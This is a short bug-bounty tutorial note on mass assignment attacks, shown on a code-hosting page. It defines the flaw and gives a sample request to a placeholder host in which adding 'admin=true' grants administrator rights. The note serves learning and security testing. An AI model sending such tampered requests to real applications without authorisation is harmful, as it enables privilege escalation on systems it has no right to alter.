crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Files
🤬
a2c07348
ROOT /
Misc /
Mass Assignment.md
37 lines | ISO-8859-1 | 695 bytes

Mass Assignment Attack

Introduction

Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS

How to exploit

  • Normal request
POST /editdata
Host: vuln.com

username=daffa

HTTP/1.1 200 OK
...

username=daffa&admin=false
  • Modified Request
POST /editdata
Host: vuln.com

username=daffa&admin=true

HTTP/1.1 200 OK
...

username=daffa&admin=true

References

Please wait...
Page is in error, reload to recover